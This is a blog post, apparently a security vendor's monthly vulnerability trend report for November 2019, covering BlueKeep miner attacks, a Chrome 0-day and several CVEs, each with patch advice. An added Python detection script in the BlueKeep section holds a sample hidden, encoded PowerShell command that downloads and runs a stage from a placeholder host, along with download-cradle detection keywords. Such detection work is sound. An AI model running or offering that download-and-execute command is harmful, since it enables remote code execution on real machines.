EclecticIQ
December 19, 2019

EclecticIQ Monthly Vulnerability Trend Report - November 2019


This blogpost aims to provide customers with an overview of trends in vulnerability disclosures and announcements on a regular basis. Where applicable, the report will provide knowledge of known exploits for trending vulnerabilities and relevant courses of action. This report is not exhaustive in nature and as such, will not include every vulnerability announced that month.

Key Findings
  • The BlueKeep vulnerability in the Remote Desktop Protocol was exploited to install a cryptocurrency miner malware.
  • A Google Chrome 0-day was exploited in a Korean-language watering-hole attack.
  • Microsoft has patched 74 vulnerabilities, 13 of which are critical.

Analysis

Newly Disclosed Vulnerabilities

Intel Processors

In November 2019, a vulnerability affecting Intel's Transactional Synchronization Extensions (TSX), dubbed ZombieLoad v2 (CVE-2019-11135), was publicly disclosed. In theory, it could allow a local attacker to steal sensitive data from the operating system kernel or from other processes.

Researchers from the VUSec group at VU Amsterdam and the CISPA Helmholtz Center provided Intel with a proof of concept (PoC) in September 2018, and researchers from TU Graz and KU Leuven provided a separate PoC in April 2019. Intel subsequently confirmed that each submission independently demonstrates TSX Asynchronous Abort (TAA).

Course of Action: 

  • Apply the CVE-2019-11135 patch

Linux

An integer overflow vulnerability, CVE-2019-18805, was discovered in Linux kernel versions prior to 5.0.11. An attacker can exploit this issue to cause a denial-of-service condition. Given the nature of the issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.

Course of Action: 

  • Update the Linux kernel to version 5.0.11

A use-after-free vulnerability, CVE-2019-18408, was discovered in Libarchive, a multi-format archive and compression library. Versions before 3.4.0 are affected. Processing a malformed archive could lead to a denial-of-service condition or to the execution of arbitrary code.

Course of Action: 

  • Update Libarchive to version 3.4.0 or later

VMware

VMware issued a security advisory for multiple vulnerabilities affecting VMware Workstation, Fusion and ESXi. Successful exploitation of the vulnerabilities could allow an attacker to gain access with the same privileges as the exploited program.

  • CVE-2019-5540 - an information disclosure vulnerability in vmnetdhcp which, if abused, could allow an attacker on a guest VM to disclose sensitive information by leaking memory from the host process.
  • CVE-2019-5541 - an out-of-bounds write vulnerability in the e1000e virtual network adapter that could lead to code execution on the host from the guest, or may allow attackers to create a denial-of-service condition on their own VM.
  • CVE-2019-5542 - a denial-of-service vulnerability in the RPC handler.

Course of Action: 

  • Apply the issued patches to mitigate CVE-2019-5540, CVE-2019-5541 and CVE-2019-5542

Exploitation of Vulnerabilities

BlueKeep

On 2 November, security researcher Kevin Beaumont posted on Twitter that multiple honeypots exposed on port 3389 (Remote Desktop Protocol, RDP) had crashed and rebooted. The observed activity indicates successful exploitation of BlueKeep (CVE-2019-0708) in the wild.

The activity was observed in October 2019, and according to another security researcher, MalwareTech, the exploitation attempts are not self-propagating. The attackers are probably working from a predefined target list of vulnerable systems. MalwareTech further reported that the payloads are multiple encoded PowerShell commands obtained from the attacker's server, eventually leading to the installation of a cryptocurrency miner (Monero Miner 2ndsp6).

The vulnerability only affects Windows 7, Windows Server 2008 R2 and Windows Server 2008, and a patch has been available for over 5 months.

Course of Action: 

  • Apply Microsoft May 2019 Security Patches
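The report above describes the BlueKeep payloads as encoded PowerShell commands that fetch further stages from the attacker's server. As an added illustration (not code from the report or from the researchers cited), the following Python check scans process-creation log lines for that pattern: PowerShell launched with an encoded command whose decoded body contains a download cradle. The sample log lines and the c2.example.invalid host are constructed.

```python
import base64
import re
from typing import List, Optional

# PowerShell accepts several abbreviations of -EncodedCommand; the argument is
# base64 over the UTF-16LE bytes of the script text.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Indicators that the decoded script fetches and runs a further stage.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\bIEX\b", re.IGNORECASE)

def encode_for_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (used here only to build samples)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

def decode_encoded_command(blob: str) -> Optional[str]:
    """Return the plaintext script, or None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def inspect_command_line(cmdline: str) -> Optional[dict]:
    """Flag a command line that launches PowerShell with an encoded command."""
    match = ENC_FLAG.search(cmdline) if "powershell" in cmdline.lower() else None
    if not match:
        return None
    script = decode_encoded_command(match.group(1))
    return {"decoded": script,
            "download_cradle": bool(script and DOWNLOAD_CRADLE.search(script))}

def scan(lines: List[str]) -> List[dict]:
    """Run the check over process-creation log lines; return one finding per hit."""
    findings = []
    for index, line in enumerate(lines):
        result = inspect_command_line(line)
        if result:
            result["index"] = index
            findings.append(result)
    return findings

# Constructed sample lines (not from the report). Line 1 mimics the pattern the
# report describes: a hidden PowerShell launch whose encoded body pulls a further
# stage from a remote host; c2.example.invalid is a placeholder.
SAMPLE_LOG_LINES = [
    "powershell.exe -NoProfile -Command Get-Process",
    "powershell.exe -nop -w hidden -enc " + encode_for_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage2.ps1')"),
    "powershell.exe -EncodedCommand QUJD",  # valid base64 but not UTF-16LE: decode fails
]
```

An undecodable blob is still reported as a finding, since a PowerShell launch with an encoded argument that cannot be decoded deserves analyst attention rather than silent discard.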

Google Chrome

In November 2019, public sources reported on a campaign dubbed Operation WizardOpium, which dates back to September 2019. In this campaign a Korean-language news portal is used in a watering-hole style attack to exploit a Google Chrome 0-day vulnerability, CVE-2019-13720. The malware variant installed on the victim system (WizardOpium Payload a3f31c) possesses persistence capabilities and attempts to download a second-stage payload from the command and control (C2) server.

The specific Chrome vulnerability used in the campaign is a use-after-free vulnerability in the Google Chrome browser's audio component, affecting Windows, Mac and Linux users. A use-after-free vulnerability can lead to program crashes or facilitate the execution of arbitrary code, locally or remotely.

Course of Action: 

  • Update Google Chrome to version 78.0.3904.87 for Windows, Mac, and Linux

Patched Vulnerabilities

Microsoft November Patch Tuesday

Microsoft patched 74 vulnerabilities as part of its November 2019 Patch Tuesday advisory, 13 of which are labeled as critical.

Among the critical vulnerabilities patched, CVE-2019-1429 was observed being actively exploited in the wild. The vulnerability exists in the scripting engine in Internet Explorer and could allow an attacker to conduct a web-based attack via specially crafted web pages. The flaw resides in how the scripting engine in Internet Explorer handles objects in memory. The specific details of the active exploitation are unknown at the time of writing. An attacker who successfully exploits the vulnerability could gain the same user rights as the current user.

Multiple other vulnerabilities labeled as critical were also addressed in the Patch Tuesday release, including a previously published vulnerability, CVE-2019-1457, which resides in certain versions of Office for Mac.

Critical vulnerabilities addressed include:

  • CVE-2019-1373 - Microsoft Exchange Remote Code Execution Vulnerability
  • CVE-2019-1441 - Win32k Graphics Remote Code Execution Vulnerability
  • CVE-2019-1419 - OpenType Font Parsing Remote Code Execution Vulnerability
  • CVE-2019-1426 - Scripting Engine Memory Corruption Vulnerability
  • CVE-2019-1427 - Scripting Engine Memory Corruption Vulnerability
  • CVE-2019-1398 - Windows Hyper-V Remote Code Execution Vulnerability
  • CVE-2019-0719 - Hyper-V Remote Code Execution Vulnerability
  • CVE-2019-1397 - Windows Hyper-V Remote Code Execution Vulnerability
  • CVE-2019-0721 - Hyper-V Remote Code Execution Vulnerability
  • CVE-2019-1389 - Windows Hyper-V Remote Code Execution Vulnerability
  • CVE-2019-1430 - Microsoft Windows Media Foundation Remote Code Execution Vulnerability

Course of Action: 

  • Apply Patches Released in Microsoft November 2019 Patch Tuesday Bulletin

Recommendations

EclecticIQ Fusion Center recommends that customers apply security updates to their systems as soon as they become available in order to mitigate the risks posed by the vulnerabilities mentioned in this report. It is worth noting that this report is a summary of the main vulnerabilities we have seen over the course of a month and as such does not reflect the full list of CVE information published by vendors.

Users should ensure they manually update their own systems even if no security vulnerabilities have been reported.
